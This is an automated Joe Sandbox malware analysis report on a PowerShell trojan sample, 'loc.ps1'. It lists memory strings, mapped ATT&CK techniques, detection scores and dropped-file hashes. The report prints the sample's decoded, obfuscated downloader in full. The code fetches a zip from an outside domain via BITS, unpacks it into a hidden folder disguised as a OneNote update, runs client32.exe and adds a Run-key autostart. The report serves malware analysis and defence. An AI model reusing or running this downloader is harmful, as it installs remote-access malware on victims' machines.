Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapterX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Add-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'Get-NetEventVmNetworkAdapter',
Source: powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
Source: powershell.exe, 00000002.00000002.441829103.00000229AD56D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc [base64-encoded command line omitted; its decoded form is shown in the next entry]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Base64 decoded .('cd') ${E`NV:ap`p`DAta}; ${L`inK}=("{0}{1}{5}{6}{7}{4}{8}{2}{3}" -f 'ht','tps:','w.','php','rms/','//usherske','nya.co.ke','/fo','vie'); ${Rn`Um}=.("{1}{2}{0}"-f'Random','Ge','t-') -minimum 5 -maximum 9; ${RRn`UM}=.("{1}{2}{0}"-f 'Random','Ge','t-') -minimum 1024 -maximum 9999; ${CH`RS}=("{9}{7}{5}{0}{4}{10}{3}{6}{1}{2}{8}" -f'ps','X','Y','J','tuvwx','no','KLMNOPRSTUVW','m','Z','abcdefghijkl','yzABCDEFGHI'); ${r`StR}=''; ${R`AN}=&("{3}{2}{1}{0}"-f 'ct','e','j','New-Ob') ("{0}{2}{1}{3}"-f 'Sy','em.Rando','st','m'); for (${I}=0; ${I} -lt ${r`NUm}; ${i}++) {${rS`Tr}+=${Ch`RS}[${R`An}.("{1}{0}" -f 't','nex').Invoke(0, ${c`HRS}."L`EnGtH")]}; ${RZ`Ip}=${r`stR}+("{1}{0}"-f'p','.zi'); ${PA`Th}=${en`V`:aPPdata}+'\'+${rZ`ip}; ${P`zIp}=${ENV:a`p`pdatA}+((("{0}{1}{2}" -f'{0}','ONEN0TE','update_')) -f[cHAr]92)+${RRn`Um}; &("{2}{3}{1}{4}{5}{0}" -f 'r','n','Start-B','itsTra','s','fe') -Source ${li`NK} -Destination ${Pa`Th}; .("{0}{1}{3}{2}"-f 'e','xpa','e','nd-archiv') -path ${pa`TH} -destinationpath ${p`zIP}; ${f`Old}=.("{2}{1}{0}" -f'em','t-It','Ge') ${p`zIP} -Force; ${Fo`lD}."atT`RIbu`T`es"=("{1}{0}"-f 'n','Hidde'); .("{0}{1}{2}" -f 'Remo','v','e-Item') -path ${pa`Th}; &('cd') ${p`ZiP}; &("{1}{0}"-f'rt','sta') ("{3}{0}{2}{1}" -f't3','xe','2.e','clien'); ${fS`TR}=${p`ZiP}+((("{3}{2}{1}{0}"-f'32.exe','ient','Ncl','T7')) -CRePLAce ([chAr]84+[chAr]55+[chAr]78),[chAr]92); ${r`Nm}=("{3}{0}{2}{1}{4}" -f 'NEN','Eupdate','0T','O','_')+${r`RN`Um}; &("{0}{1}{4}{3}{2}"-f 'New-Item','Pro','
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
ATT&CK tactics and the techniques listed under each (numbers in parentheses are the report's per-technique signature counts):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (11); PowerShell (2); At (Linux); At (Windows); Cron; Launchd
Persistence: Registry Run Keys / Startup Folder (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection (11); Registry Run Keys / Startup Folder (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (21); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (11)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel (1); Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data
Source | Detection | Scanner | Label | Link
loc.ps1 | 8% | ReversingLabs | Text.Trojan.Generic |
loc.ps1 | 22% | Virustotal | | Browse
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://usherskenya.co.ke/forms/view.php8F | 0% | Avira URL Cloud | safe |
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000003.435183245.00000229AD753000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://usherskenya.co.ke/forms/view.php8F | powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.473249087.00000281B9C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.441829103.00000229AC1B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmp | false | | high
No contacted IP infos

Joe Sandbox Version: 37.1.0 Beryl
Analysis ID: 876995
Start date and time: 2023-05-28 09:32:52 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: loc.ps1
Detection: MAL
Classification: mal64.troj.evad.winPS1@4/8@0/0
EGA Information:
• Successful, ratio: 50%
HDC Information: Failed
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 14
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
• Excluded domains from analysis (whitelisted): usherskenya.co.ke, ctldl.windowsupdate.com
• Execution Graph export aborted for target powershell.exe, PID 6560 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.

Time | Type | Description
09:33:52 | API Interceptor | 65x Sleep call for process: powershell.exe modified
09:34:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220 C:\Users\user\AppData\Roaming\ONEN0TEupdate_1220\client32.exe
09:34:23 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220 C:\Users\user\AppData\Roaming\ONEN0TEupdate_1220\client32.exe

No context

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 24349
Entropy (8bit): 5.044789539417162
Encrypted: false
SSDEEP: 384:1fib4GxVoGIpN6KQkj2Akjh4iUxGz75ard3GnaOdBQtAHkoNXp5XNSSmebvOjJEm:1IxV3IpNBQkj25h4iUxGz75ard3GnaOQ
MD5: 4CE762BE063FD056F19DFE6020C1C756
SHA1: 49898445B83E8FE02CCC1E2ACD47130CA237CC85
SHA-256: E902C6A8B5ECD8371795819B77445FC3C233B1FA7FC423F97FD52F13EF394049
SHA-512: 699D2F7CC17E60B40C3DFC836AE6989E39DDF439A4ACA8A00EEF36CB028AEFFE8B88B545D6E50112B1C60AD78CCB5F26E27C3ADA1261967A873F26D418693FC2
Malicious: false
Reputation: moderate, very likely benign file
Preview: PSMODULECACHE.%..._t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.9260988789684415
Encrypted: false
SSDEEP: 3:Nlllulb/lj:NllUb/l
MD5: 13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1: F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256: 168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512: 1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious: false
Reputation: high, very likely benign file
Preview: @...e................................................@..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Preview: 1

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6206
Entropy (8bit): 3.756573599783991
Encrypted: false
SSDEEP: 48:94PQFjXe/9IWoF4sCErUHIJ8DgxIukvhkvklCywE1xPhou8keSogZoX1qvhou8kF:9/S9IzWsC/f4kvhkvCCtEfrJHKGrJHKA
MD5: D8B0D167692A44937F77B1DEE0A2E153
SHA1: CA9D4DB7C5B90C649997C67D4B7FAB35BB98A718
SHA-256: B72E14C0A43285C3AAA1568E54E0D67E1FDF5911BA078052506CA05F42D9FF18
SHA-512: DA5850C34D0A5B5F7649976F1BC78CD737B0037A232E1C0731C1C2B28BFFA4F8B061CDEDB79608A5F8199F66B7462F33216A616C734B99C16B697EEF783E7E08
Malicious: false
Preview: ...................................FL..................F.".. .......-..7.4..a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....................t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..V3......Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..V3......Y....................f...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......NM..V3......Y.....................f0.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......NM..U.......Y.....................@9.W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..U.......Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..U.......Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......NM..U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......NM..P......Y..........

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 6206
Entropy (8bit): 3.756573599783991
Encrypted: false
SSDEEP: 48:94PQFjXe/9IWoF4sCErUHIJ8DgxIukvhkvklCywE1xPhou8keSogZoX1qvhou8kF:9/S9IzWsC/f4kvhkvCCtEfrJHKGrJHKA
MD5: D8B0D167692A44937F77B1DEE0A2E153
SHA1: CA9D4DB7C5B90C649997C67D4B7FAB35BB98A718
SHA-256: B72E14C0A43285C3AAA1568E54E0D67E1FDF5911BA078052506CA05F42D9FF18
SHA-512: DA5850C34D0A5B5F7649976F1BC78CD737B0037A232E1C0731C1C2B28BFFA4F8B061CDEDB79608A5F8199F66B7462F33216A616C734B99C16B697EEF783E7E08
Malicious: false
